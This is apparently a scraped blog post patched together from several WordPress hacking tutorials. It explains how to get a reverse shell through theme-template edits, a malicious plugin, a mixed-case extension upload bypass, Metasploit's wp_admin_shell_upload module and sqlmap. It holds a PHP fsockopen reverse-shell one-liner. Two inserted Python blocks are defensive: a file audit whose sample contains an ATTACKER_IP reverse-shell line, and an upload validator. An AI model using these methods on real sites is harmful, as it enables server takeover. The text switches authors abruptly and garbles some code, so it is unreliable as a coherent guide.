
How To Upload Shell On WordPress

  • leontynefrost892v9
  • Aug 17, 2023
  • 6 min read


After exploiting a remote command execution vulnerability, we can use a reverse shell to obtain an interactive shell session on the target machine. Throughout this article we use a web shell to obtain a reverse shell from the target machine. Ready? We execute the given command to edit the localhost address in the malicious shell.


Sometimes plugins installed in the WordPress CMS are vulnerable, and by taking advantage of them we can upload malicious PHP shells to the target server and get reverse shells. In our case, as you can see, a vulnerable plugin called Reflex is installed on the WordPress CMS, so we will try to exploit the target machine by uploading a shell through this plugin.








The first method we have is the Metasploit framework. This module takes an administrator username and password, logs into the admin panel, and uploads a payload packaged as a WordPress plugin. Because this is authenticated code execution by design, it should work on all versions of WordPress, and as a result it gives a Meterpreter session on the web server.


Now, to proceed further, we used the PHP reverse shell (by Pentestmonkey). We copied the php-reverse-shell and pasted it into the 404.php WordPress template, as shown in the picture below. We changed the IP address to our current IP address, entered any port we wanted, and started a netcat listener to receive the reverse connection.


Once the plugin file is updated, we again need to start our netcat listener, and then we trigger the reverse shell with the curl command. The second way is to navigate to the edited plugin directory in the browser.


As you might have guessed, Metasploit could not be missing from this post. It is the leading penetration testing framework in the security field. Metasploit has a module that makes it easy to upload a reverse shell as a payload to the WordPress site. Follow the steps below.


This module will automatically authenticate to the WordPress site and upload a reverse shell. If successful, it will launch a Meterpreter session where you can execute commands directly on the web server. Use the help command to list all the available options.


To execute the PHP reverse shell you just set up, you need to trigger the 404 page. You can easily do that by navigating to a page you are sure does not exist on the website. For example, we will try accessing the dummydummydummy page for this post.


I'm working on a project which involves creating a WordPress plugin and it got me to thinking about how easy it would be to create a plugin whose sole purpose is a reverse shell. To get a shell from a WordPress UI, I've used plugins that allow for inclusion of PHP and I've also edited embedded PHP such as the footer.php file. But until now, it didn't occur to me to write a plugin to perform the task. I started tinkering around and I initially used Pentest Monkey's reverse shell and even though it tossed back a shell, it also killed the WordPress site. I literally had to go into the /wp-content/plugins directory to manually remove the plugin before the site would function correctly again. Not ideal for a number of reasons.


At that point, I decided to take a more basic approach. First things first, if you just drop PHP into a file and try to upload it as a plugin, it won't work. I didn't bother to dig into the details but I think we need the comment section at the top in order for WordPress to treat it like a plugin. When I added that comment information, my plugin was successfully uploaded. The code is pretty basic and it looks like this:


There's literally more comment than code. If we were on the server itself, we could drop this PHP file into the /wp-content/plugin folder, but if we were already on the server, we probably wouldn't need a reverse shell. Perhaps for the sake of persistence? Perhaps not. I'm just tossing that out there as an FYI. In order to upload the shell as a plugin, we need to zip it up:


If at this point we selected Plugins from the WordPress UI, we would see that the shell is not activated. Technically it is activated, the shell is proof, but the shell is also hanging the completion of the Activate process. If we kill the shell and then move into Plugins, we'd see:


This is about as basic as you can get. It's definitely dirty in the sense that it consistently attempts to toss a shell every time you mess with the Plugins menu item. This could be cleaned up and it could also be repurposed to do just about anything you can code in PHP.


Users are allowed to upload files with extensions such as png, txt and pdf, among others, but are prohibited from uploading PHP files. Attempts to upload other potentially dangerous file formats like php3, php5, phtml etc. were also rejected.


To execute the exploit, we visit the endpoint -content/uploads/sp-client-document-manager/2/webshell.php. The URL serves the uploaded webshell.pHP file regardless of the case of the extension, allowing us to execute commands. Note that 2 is the UID of the logged-in user that uploaded the file.


After verifying the exploit, we can either upload a PHP reverse shell file like the one from pentestmonkey, or upgrade our web shell to a reverse shell by executing the PHP command php -r '$sock=fsockopen("IP",PORT);exec("/bin/sh -i &3 2>&3");' and setting our server to listen on the port we specified.


2. On the left-hand side, under Appearance, you will see the Editor option; open it.
3. In the editor you will see the different themes. Select any theme you want and then select a template, as shown in the image below.
4. After selecting the theme and template, replace the template's code with our shell code and then upload the file.
5. After uploading the file it should show "File edited successfully". Then go to the shell's location, i.e. www.targetsite.com/wp-content/themes/yourtheme/templatename.php. Our shell is uploaded.
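The defensive counterpart to the three methods covered so far (a reverse shell pasted into 404.php or another theme template, a plugin that is really a shell, and PHP dropped under uploads/): an added Python audit over wp-content/, not code from the page or from WordPress. The file listing is constructed, and the regexes and the one-day "recently modified" window are assumptions to tune for your own site.

```python
import re
from datetime import datetime, timedelta

# PHP primitives that rarely belong in a theme template or in a plugin from the
# official directory. A socket call and a shell call together in one file is the
# reverse-shell shape used by the 404.php and plugin methods described above.
SOCKET_CALLS = re.compile(rb"\b(fsockopen|socket_create|stream_socket_client)\s*\(", re.I)
SHELL_CALLS = re.compile(rb"\b(exec|shell_exec|system|passthru|popen|proc_open)\s*\(", re.I)
# Case-insensitive on purpose: the server treated webshell.pHP as PHP too.
PHP_EXT = re.compile(r"\.(php\d?|phtml|phar|phps)$", re.I)

def audit(files, now, max_age=timedelta(days=1)):
    """files: iterable of (path relative to wp-content/, content bytes, mtime).
    Returns a list of (path, reason) findings for a human to triage."""
    findings = []
    for path, data, mtime in files:
        top = path.split("/", 1)[0]
        is_php = bool(PHP_EXT.search(path))
        if top == "uploads" and is_php:
            findings.append((path, "PHP file inside uploads/ (should never be executable)"))
            continue
        if not is_php or top not in ("themes", "plugins"):
            continue
        has_sock = bool(SOCKET_CALLS.search(data))
        has_shell = bool(SHELL_CALLS.search(data))
        if has_sock and has_shell:
            findings.append((path, "socket + shell primitives (reverse-shell shape)"))
        elif (has_sock or has_shell) and now - mtime < max_age:
            findings.append((path, "shell/socket primitive in a recently modified file"))
    return findings

# Constructed sample listing mirroring the page's three methods; not real site data.
NOW = datetime(2023, 8, 17, 12, 0)
SAMPLE = [
    ("themes/twentytwentythree/404.php",
     b'<?php $sock = fsockopen("ATTACKER_IP", 4444); exec($cmd); ?>', NOW - timedelta(minutes=5)),
    ("plugins/shell/shell.php",
     b"<?php /* Plugin Name: shell */ proc_open($cmd, $spec, $pipes); ?>", NOW - timedelta(hours=2)),
    ("uploads/sp-client-document-manager/2/webshell.pHP", b"<?php echo 1; ?>", NOW),
    ("themes/twentytwentythree/index.php", b"<?php get_header(); ?>", NOW - timedelta(days=30)),
    ("plugins/akismet/class.akismet.php", b"<?php exec('ls'); ?>", NOW - timedelta(days=400)),
]

if __name__ == "__main__":
    for path, reason in audit(SAMPLE, NOW):
        print(f"{path}: {reason}")
```

In production, feed audit() from a walk of the real wp-content/ tree and compare against file hashes from a clean install, so that legitimate plugin code that happens to call exec() is not re-triaged on every run.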


This page contains detailed information about how to use the exploit/unix/webapp/wp_admin_shell_upload Metasploit module. For a list of all Metasploit modules, visit the Metasploit Module Library.


Name: WordPress Admin Shell Upload
Module: exploit/unix/webapp/wp_admin_shell_upload
Source code: modules/exploits/unix/webapp/wp_admin_shell_upload.rb
Disclosure date: 2015-02-21
Last modification time: 2021-08-29 16:59:44 +0000
Supported architecture(s): php
Supported platform(s): PHP
Target service / protocol: http, https
Target network port(s): 80, 443, 3000, 8000, 8008, 8080, 8443, 8880, 8888
List of CVEs: -


This module takes an administrator username and password, logs into the admin panel, and uploads a payload packaged as a WordPress plugin. Because this is authenticated code execution by design, it should work on all versions of WordPress.


Hello aspiring Ethical Hackers. In this article you will learn about multiple WordPress reverse shell methods. As you may already know, WordPress is a popular open source Content Management System (CMS) based on PHP, with MySQL or MariaDB as the database. It was released in 2003.


In this article we will show you how to gain a reverse shell on a WordPress website once we have the website's credentials. This is a comprehensive collection of methods for gaining a reverse shell on WordPress. This tutorial assumes that you have already acquired WordPress credentials and can access the WordPress dashboard.


This will give us a Meterpreter session. These are the four common methods through which a reverse shell can be obtained on WordPress. Now you decide: which is your favourite method of gaining a reverse shell on WordPress?


The image manager is locked down pretty well at this point from non-authorized users. If the account is compromised or the upload manager is exposed publicly, it will still be hard to exploit. As you can see from the source, the uploader verifies MIME types, checks that it's an image with getimagesize(), sanitizes file names, creates the file name with the extension hard-coded based on the MIME type, sets default file permissions, sanitizes embedded data like EXIF information, and re-samples the file when it creates the multiple sizes. The way the upload code works, you don't get any attack points into the GD image processing library either.


Aside from their protection, if the file has an image extension the server's MIME types are not configured to pipe it through the php-cgi process. Meaning, simply opening the image in a browser will not run the PHP code. You would have to have a PHP script run the code embedded in the image, and you likely won't find vulnerabilities in the code base that do this for you. This is universal, so you will also have difficulty with other image uploaders if they restrict PHP file extensions as well.
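A hardened upload validator of the kind the paragraphs above describe (case-insensitive extension allow-list, content signature check, refusal of any PHP open tag, and a server-generated file name whose extension is fixed from the validated type rather than taken from the client), as an added Python example that is not code from the page or from WordPress. The allow-list and magic-byte signatures are constructed assumptions; the same check also rejects the mixed-case webshell.pHP trick from the document-manager example earlier on the page.

```python
import os
import re
import secrets

# Allow-list: lower-case extension -> bytes the file must start with.
# (Constructed for this example; extend to the types your site really needs.)
ALLOWED = {
    "png": b"\x89PNG\r\n\x1a\n",
    "jpg": b"\xff\xd8\xff",
    "jpeg": b"\xff\xd8\xff",
    "gif": b"GIF8",
    "pdf": b"%PDF-",
    "txt": b"",          # no magic bytes; rely on extension plus the PHP-tag check
}
# Anything a web server or a misconfigured handler might hand to the PHP engine.
# Compared in lower case, so webshell.pHP and x.PhTmL are caught as well.
EXECUTABLE = {"php", "php3", "php4", "php5", "php7", "php8", "phps",
              "phtml", "phar", "inc", "htaccess"}

def validate_upload(user_name: str, data: bytes):
    """Return (ok, stored_name_or_reason).

    On success the stored name is random and its extension comes from the
    allow-list entry we validated against, never from the client's string.
    """
    base = os.path.basename(user_name)
    parts = base.lower().split(".")
    if len(parts) < 2 or not all(parts):
        return False, "missing or empty extension"
    # Reject double extensions such as shell.php.png: every segment after
    # the first is checked, not just the last one.
    for seg in parts[1:]:
        if seg in EXECUTABLE:
            return False, f"executable extension segment '{seg}'"
    ext = parts[-1]
    if ext not in ALLOWED:
        return False, f"extension '{ext}' not in allow-list"
    if not data.startswith(ALLOWED[ext]):
        return False, f"content does not match {ext} signature"
    # Defence in depth: refuse any body containing a PHP open tag.
    if re.search(rb"<\?(php|=)", data, re.IGNORECASE):
        return False, "PHP open tag found in file body"
    return True, f"{secrets.token_hex(16)}.{ext}"
```

Pair this with a web-server rule that disables script execution under the uploads directory, so that even a validator bug does not turn a stored file into executable code.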


The --os-shell works for MySQL by attempting to use INTO OUTFILE to write a file to the web root. This can fail for any number of reasons, the most common being that the database and web server are different machines. Ubuntu's default AppArmor rule sets forbid MySQL from writing to /var/www/. Also, INTO OUTFILE requires FILE privileges that should never be granted (but often are). You could try using sqlmap's file-io functionality to read and write to the remote file system.

